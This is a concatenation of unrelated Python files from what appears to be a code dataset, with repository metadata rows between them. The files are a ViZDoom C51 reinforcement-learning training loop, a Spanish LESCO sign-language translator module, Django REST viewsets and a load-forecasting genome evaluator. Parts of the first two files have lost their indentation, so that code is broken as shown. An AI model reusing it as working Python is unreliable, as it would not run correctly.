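        # so that atom's probability mass is split between bins 26 and 27 with
        # weights 0.875 and 0.125 respectively.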
loss = self.model.fit(state_inputs, m_prob, batch_size=self.batch_size, epochs=1, verbose=0)
return loss.history['loss']

    # Load the saved model
    def load_model(self, name):
        self.model.load_weights(name)

    # Save the model which is under training
    def save_model(self, name):
        self.model.save_weights(name)
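

# Usage sketch (not part of the original flow): to resume training from a
# checkpoint, build the agent as in __main__ below and call
#   agent.load_model("./models/c51_ddqn.h5")
# before entering the game loop; save_model() writes the same weights file.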

if __name__ == "__main__":
    print("System path")
    print(sys.path)

    # Avoid Tensorflow eating up all of the GPU memory
    config = tf.ConfigProto()
    config.gpu_options.allow_growth = True
    sess = tf.Session(config=config)
    K.set_session(sess)

    game = DoomGame()
    # game.load_config("..\..\scenarios\defend_the_center.cfg")
    game.load_config("/Users/tesla/Downloads/ViZDoom-master/scenarios/defend_the_center.cfg")
    game.set_sound_enabled(True)
    game.set_screen_resolution(ScreenResolution.RES_640X480)
    game.set_window_visible(False)
    game.set_mode(Mode.PLAYER)
    game.init()
    game.new_episode("./episode_rec/ep1.lmp")

    game_state = game.get_state()
    misc = game_state.game_variables  # [KILLCOUNT, AMMO, HEALTH]
    prev_misc = misc

    action_size = game.get_available_buttons_size()

    img_rows, img_cols = 64, 64
    # The image is converted to black and white
    img_channels = 4  # We stack 4 frames

    # C51
    num_atoms = 51

    state_size = (img_rows, img_cols, img_channels)
    agent = C51Agent(state_size, action_size, num_atoms)

    agent.model = Networks.value_distribution_network(state_size, num_atoms, action_size, agent.learning_rate)
    agent.target_model = Networks.value_distribution_network(state_size, num_atoms, action_size, agent.learning_rate)

    x_t = game_state.screen_buffer  # 480 x 640
    x_t = preprocessImg(x_t, size=(img_rows, img_cols))
    s_t = np.stack(([x_t] * 4), axis=2)  # It becomes 64x64x4
    s_t = np.expand_dims(s_t, axis=0)  # 1x64x64x4
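
    # Shape bookkeeping for the lines above: screen_buffer (480x640)
    # -> preprocessImg -> (64, 64) -> stack of 4 copies -> (64, 64, 4)
    # -> expand_dims -> (1, 64, 64, 4), i.e. state_size plus a batch axis.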

    is_terminated = game.is_episode_finished()

    # Start training
    epsilon = agent.initial_epsilon
    GAME = 0
    t = 0
    max_life = 0  # Maximum episode life (proxy for agent performance)
    life = 0

    # Buffers to compute rolling statistics
    tot_reward_buffer, life_buffer, ammo_buffer, kills_buffer, mavg_score, \
        var_score, mavg_ammo_left, mavg_kill_counts, \
        mavg_tot_rewards = [], [], [], [], [], [], [], [], []
    losses_buffer, epsilon_buffer, stats_store = [], [], []
    episode_co = 1

    while not game.is_episode_finished():

        loss = 0
        r_t = 0
        a_t = np.zeros([action_size])

        # Epsilon-greedy action selection
        action_idx = agent.get_action(s_t)
        a_t[action_idx] = 1

        a_t = a_t.astype(int)
        game.set_action(a_t.tolist())
        skiprate = agent.frame_per_action
        game.advance_action(skiprate)

        game_state = game.get_state()  # Observe again after we take the action
        is_terminated = game.is_episode_finished()
        r_t = game.get_last_reward()  # Each frame gives a reward of 0.1, so 4 frames give 0.4

        if is_terminated:
            if life > max_life:
                max_life = life
            GAME += 1
            life_buffer.append(life)
            ammo_buffer.append(misc[1])
            kills_buffer.append(misc[0])
            print("Episode Finish ", misc)
            game.new_episode("./episode_rec/ep" + str(episode_co) + "_rec.lmp")
            episode_co += 1
            game_state = game.get_state()
            misc = game_state.game_variables
            x_t1 = game_state.screen_buffer

        x_t1 = game_state.screen_buffer
        misc = game_state.game_variables

        x_t1 = preprocessImg(x_t1, size=(img_rows, img_cols))
        x_t1 = np.reshape(x_t1, (1, img_rows, img_cols, 1))
        s_t1 = np.append(x_t1, s_t[:, :, :, :3], axis=3)

        r_t = agent.shape_reward(r_t, misc, prev_misc, t)

        if is_terminated:
            life = 0
        else:
            life += 1

        # Update the cache
        prev_misc = misc

        # Save the sample <s, a, r, s'> to the replay memory and decrease epsilon
        agent.replay_memory(s_t, action_idx, r_t, s_t1, is_terminated, t)

        # Do the training
        if t > agent.observe and t % agent.timestep_per_train == 0:
            loss = agent.train_replay()
            losses_buffer.append({'loss': loss, 'episode': GAME})

        s_t = s_t1
        t += 1

        # Save progress every 10000 iterations
        if t % 10000 == 0:
            print("Now we save the model")
            agent.model.save_weights("./models/c51_ddqn.h5", overwrite=True)

        # Print info
        state = ""
        if t <= agent.observe:
            state = "observe"
        elif t > agent.observe and t <= agent.observe + agent.explore:
            state = "explore"
        else:
            state = "train"

        if is_terminated:
            print("TIME", t, "/ GAME", GAME, "/ STATE", state,
                  "/ EPSILON", agent.epsilon, "/ ACTION", action_idx, "/ REWARD", r_t,
                  "/ LIFE", max_life, "/ LOSS", loss)
            epsilon_buffer.append(agent.epsilon)
            tot_reward_buffer.append(r_t)

            # Save the agent's performance statistics
            if GAME % agent.stats_window_size == 0 and t > agent.observe:
                print("Update Rolling Statistics")
                agent.mavg_score.append(np.mean(np.array(life_buffer)))
                agent.var_score.append(np.var(np.array(life_buffer)))
                agent.mavg_ammo_left.append(np.mean(np.array(ammo_buffer)))
                agent.mavg_kill_counts.append(np.mean(np.array(kills_buffer)))
                mavg_tot_rewards.append(np.mean(np.array(tot_reward_buffer)))

                # Write rolling statistics to file
                with open("./c51_ddqn_stats.txt", "w") as stats_file:
                    stats_file.write('Game: ' + str(GAME) + '\n')
                    stats_file.write('Max Score: ' + str(max_life) + '\n')
                    stats_file.write('mavg_score: ' + str(agent.mavg_score) + '\n')
                    stats_file.write('var_score: ' + str(agent.var_score) + '\n')
                    stats_file.write('mavg_ammo_left: ' + str(agent.mavg_ammo_left) + '\n')
                    stats_file.write('mavg_kill_counts: ' + str(agent.mavg_kill_counts) + '\n')
                    stats_file.write('mavg_rewards: ' + str(mavg_tot_rewards) + '\n')

                # NOTE: the original passed stats_store.append(...) straight to
                # pickle.dump(); list.append() returns None, so only None was
                # pickled. Append first, then dump the record itself.
                stats_record = {'game': GAME, 'max_score': max_life,
                                'mavg_score': agent.mavg_score,
                                'var_score': agent.var_score,
                                'mavg_ammo_left': agent.mavg_ammo_left,
                                'mavg_kill_counts': agent.mavg_kill_counts,
                                'mavg_tot_rewards': mavg_tot_rewards}
                stats_store.append(stats_record)
                with open("./ddqn_pr_steps_stats" + str(GAME) + ".pickle", 'wb') as handle:
                    pickle.dump(stats_record, handle, protocol=pickle.HIGHEST_PROTOCOL)

                buffer_record = {'life_buffer': life_buffer,
                                 'ammo_buffer': ammo_buffer,
                                 'kills_buffer': kills_buffer,
                                 'tot_reward_buffer': tot_reward_buffer,
                                 'losses': losses_buffer,
                                 'epsilon': epsilon_buffer}
                stats_store.append(buffer_record)
                with open("./buffer_dic_data" + str(GAME) + ".pickle", 'wb') as handle:
                    pickle.dump(buffer_record, handle, protocol=pickle.HIGHEST_PROTOCOL)

                # Reset the rolling stats buffers (moved after the dumps so the
                # pickled buffers are not always empty, as in the original)
                life_buffer, ammo_buffer, kills_buffer = [], [], []
| [
"[email protected]"
]
| |
aca6cfcb482c568e01a5e582aa8c9f728f17fa4b | 3075d466d4482281fbff51bd71dd4e1c11aae7ee | /src/SintacticoSemantico.py | 479ef6f0bcba71872a8f84740609e1c6f2f1c522 | []
| no_license | AndresRQ27/LESCO-Translator | 97c68f6a74826ac8bda8f2a768856f88e87733dc | 50f487fca45e9a1f7e5697224ba72ace79d65802 | refs/heads/master | 2020-03-07T03:36:28.543380 | 2018-10-20T16:24:26 | 2018-10-20T16:24:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,606 | py | # coding=utf-8
def semantico(lista):
palabras = sintactico(lista)
t = pronombre(palabras)
r = pregunta(palabras[0])
palabras[0] = palabras[0][0].upper()+palabras[0][1:]
v = posVerb(palabras)
if(palabras != ""):
if(r[0]):
palabras[0] = "¿"+palabras[0]
if(t[0]):
palabras[v] = fixVerb(t[1],palabras)
else:
palabras[1] = fixVerb("usted", palabras)
palabras[len(palabras)-1] = palabras[len(palabras)-1]+"?"
print str(palabras)
return palabras
elif(t[0]):
if(t[0]):
if(palabras[t[2]+1]!=""):
palabras[t[2]] = t[1]
palabras[v] = fixVerb(t[1], palabras)
else:
print("no hay verbo")
print str(palabras)
return palabras
else:
print str(palabras)
return palabras


def posVerb(palabras):
    verb = ["ser", "estar", "ir", "venir", "tener", "hacer", "decir", "comer", "llamar", "cumplir", ""]
    n = -1
    for x in range(0, len(palabras)):
        for y in verb:
            if palabras[x] == y:
                n = x
    return n


def pronombre(palabras):
    exc = ["yo", "usted", "ustedes", "nosotros", "ellos", "él", "ella"]
    x = False
    y = ""
    n = 0
    for e in exc:
        for w in range(len(palabras)):
            if e == palabras[w]:
                # NOTE: assumes a token follows the pronoun; palabras[w + 1]
                # raises IndexError if the pronoun is the last word.
                if palabras[w + 1] == "nombre":
                    if e == "yo":
                        e = "mi"
                    elif e == "usted":
                        e = "su"
                    else:
                        e = "sus"
                x = True
                y = e
                n = w
    print(y)
    return [x, y, n]


def pregunta(palabra):
    preg = ["donde", "cual", "que", "como", "cuando", "porque"]
    t = False
    w = ""
    for x in preg:
        if x == palabra:
            t = True
            w = x
            print(x)
    return [t, w]


def fixVerb(pron, palabras):
    verb = ["ser", "estar", "ir", "venir", "tener", "hacer", "decir", "llamar", "cumplir", ""]
    conjY = ["soy", "estoy", "voy", "vengo", "tengo", "hago", "digo", "llamo", "cumplo"]
    conjEEU = ["es", "está", "va", "viene", "tiene", "hace", "dice", "llama", "cumple"]
    conUs = ["son", "están", "van", "vienen", "tienen", "hacen", "dicen", "llaman", "cumplen"]
    conN = ["somos", "estamos", "vamos", "venimos", "tenemos", "hacemos", "decimos", "llamamos", "cumplimos"]
    w = ""
    for x in palabras:
        for y in range(0, len(verb)):
            # Guard against the trailing "" entry in verb: the conjugation
            # lists have one element less, so matching it would raise an
            # IndexError in the original code.
            if x == verb[y] and verb[y] != "":
                if pron == "él" or pron == "ella" or pron == "usted" or pron == "mi" or pron == "su":
                    w = conjEEU[y]
                elif pron == "yo":
                    w = conjY[y]
                elif pron == "ustedes" or pron == "sus":
                    w = conUs[y]
                else:
                    w = conN[y]
    return w
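
# Usage sketch (hypothetical inputs): fixVerb("yo", ["ser"]) returns "soy",
# and fixVerb("ustedes", ["tener"]) returns "tienen".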


def sintactico(palabras):
    n = 0
    res = []
    for x in range(0, len(palabras)):
        w = ""
        if palabras[x] == " ":
            for y in range(n, x):
                if palabras[y] == "10" and palabras[y + 1] != " ":
                    s = int(10) + int(palabras[y + 1])
                    k = str(s)
                    w += k
                elif palabras[y - 1] == "10":
                    # The digit was already folded into the 10+x sum above;
                    # the original bare string "suma" acted as a no-op placeholder.
                    pass
                else:
                    if palabras[y] != w or w.isdigit():
                        w += palabras[y]
            n = x + 1
            res += [w]
            w = ""
    return res
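
# Usage sketch (hypothetical token stream): signs arrive one at a time and
# " " closes a word, so
#   sintactico(["h", "o", "l", "a", " "]) -> ["hola"]
# and a "10" followed by a digit is folded into a single number, e.g.
#   sintactico(["10", "5", " "]) -> ["15"].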
| [
"[email protected]"
]
| |
e6215762208ab16d0230d27ae2bd2259e021ac48 | 830837f1ca1a4d090f9979f1d448017cbf88065c | /tutorial/quickstart/views.py | eede40c2e82a5d2cee4c62f62a4c009e8e4fd883 | []
| no_license | arshadansari27/django-angular | 3bd32a937cc6f0977d00fb7fe93203011aec786e | 558472df5071dc93973173ae83aefbac0eb4fdc4 | refs/heads/master | 2016-08-12T03:34:54.079002 | 2015-11-26T08:20:36 | 2015-11-26T08:20:36 | 46,878,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 610 | py | from django.contrib.auth.models import User, Group
from rest_framework import viewsets
from tutorial.quickstart.serializers import UserSerializer, GroupSerializer
from django.shortcuts import render
class UserViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows users to be viewed or edited.
"""
queryset = User.objects.all().order_by('-date_joined')
serializer_class = UserSerializer
class GroupViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows groups to be viewed or edited.
"""
queryset = Group.objects.all()
serializer_class = GroupSerializer
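
# Wiring sketch (assumed to live in urls.py, not in this file): these
# viewsets are typically exposed through a DRF router, e.g.
#   from rest_framework import routers
#   router = routers.DefaultRouter()
#   router.register(r'users', UserViewSet)
#   router.register(r'groups', GroupViewSet)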
| [
"[email protected]"
]
| |
fd08376b9c08c60bb8b11cd622e7317f4e26a932 | 722b35b7617e5b715b964419eb81de1c8958c4d1 | /locacoes/apps.py | 4e2edd5bf82f1453d7cc05d7206ffe50fae2a85a | []
| no_license | gugajung/StarVideo | 83dad32e256ce4335debc9df27be9b75e9cd32ce | 44bab79c5bc3abb3d27d519bc13ece304f28672b | refs/heads/master | 2020-09-27T03:43:56.327484 | 2019-11-19T18:19:03 | 2019-11-19T18:19:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 121 | py | """
Apps: App 'locacoes'
"""
from django.apps import AppConfig
class LocacoesConfig(AppConfig):
name = 'locacoes'
| [
"[email protected]"
]
| |
dcd0da39888cc54780f3269f3b421d663fbe0369 | 12d0f444452d3b2218cd270756283a0463d3e796 | /sg/models/genome_evaluator.py | ebfcee9c68636525d62cd1370f29350bfbce32e0 | []
| no_license | dal3006/load_forecasting-1 | 107ffdbb4648989ba85fa8ba39ecdddb9c24ddd1 | d324a711a1a0c7ccd9587e0ecf9988a12214a1a3 | refs/heads/master | 2023-03-17T07:44:43.487863 | 2015-03-12T15:24:37 | 2015-03-12T15:24:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,873 | py | """Use this program to evaluate one genome at a time, read from standard
input."""
import sys
import ast
import traceback
import random
import matplotlib.pyplot as plt
import sg.utils.pyevolve_utils as pu
import sg.utils
import ga
import sg.data.sintef.userloads as ul
import load_prediction as lp
from load_prediction_ar import *
from load_prediction_ar24 import *
from load_prediction_arima import *
from load_prediction_dshw import *
from load_prediction_esn import *
from load_prediction_esn24 import *
try:
from load_prediction_CBR import *
from load_prediction_wavelet import *
from load_prediction_wavelet24 import *
except ImportError:
print >>sys.stderr, "Genome evaluator can't import CBR/wavelet modules, probably some of the dependencies are not installed."
options = None
def get_options():
global options
parser = lp.prediction_options()
parser = lp.ga_options(parser)
parser = lp.data_options(parser)
parser.add_option("--model", dest="model", help="The model class that the genomes instantiate", default=None)
parser.add_option("--test-set", dest="test_set", action="store_true",
help="Test the genomes on the test set, rather than on the training set", default=False)
parser.add_option("--plot", dest="plot", action="store_true",
help="Make a plot (in combination with --test-set)", default=False)
(options, args) = parser.parse_args()
lp.options = options
if options.model is None:
print >>sys.stderr, "Model argument is required."
sys.exit(1)
def read_next_genome_list():
print "Enter genome to be evaluated: "
line = sys.stdin.readline()
if line == "":
print "End of input, exiting."
sys.exit(0)
return ast.literal_eval(line)
def next_indiv():
gl = read_next_genome_list()
genome = pu.AllelesGenome()
genome.setInternalList(gl)
genome.setParams(num_trials=options.num_trials)
return genome
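
# Input sketch (format inferred from ast.literal_eval above): each line on
# stdin must be a Python literal list, e.g.
#   [0.1, 24, 100]
# which becomes the allele list of the genome under evaluation; the actual
# allele layout depends on the model class passed via --model.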


def gene_test_loop(model):
    while sys.stdin:
        ga._model = model
        indiv = next_indiv()
        if options.test_set:
            print "Evaluating genome on test set: ", indiv[:]
            sys.stdout.flush()
            try:
                (target, predictions) = lp.parallel_test_genome(indiv, model) \
                    if options.parallel else lp.test_genome(indiv, model)
            except Exception, e:
                print >>sys.stderr, "Exception raised, failed to evaluate genome."
                tb = " " + traceback.format_exc(limit=50)[:-1]
                print >>sys.stderr, tb.replace("\n", "\n ")
                continue
            error = sg.utils.concat_and_calc_error(predictions, target, model.error_func)
            print "Error on test phase: {}".format(error)
            if options.plot:
                sg.utils.plot_target_predictions(target, predictions)
                plt.show()
        else:
            print "Evaluating genome on training set: ", indiv[:]
            sys.stdout.flush()
            fitness = ga._fitness(indiv)
            print "Fitness:", fitness
            if fitness != 0:
                print "Error:", ga._fitness_to_error(fitness)
            else:
                print "Error not calculated for 0 fitness."


def run():
    """Evaluate genomes read from standard input."""
    get_options()
    prev_handler = np.seterrcall(lp.float_err_handler)
    prev_err = np.seterr(all='call')
    np.seterr(under='ignore')
    random.seed(options.seed)
    np.random.seed(options.seed)
    model_creator = eval(options.model + "(options)")
    model = model_creator.get_model()
    lp._print_sim_context(model._dataset)
    print "Number of training sequences: %d" % options.num_trials
    print "Start days of training sequences:", model._dataset.train_periods_desc
    gene_test_loop(model)
    ul.tempfeeder_exp().close()


if __name__ == "__main__":
    run()
| [
"[email protected]"
]
|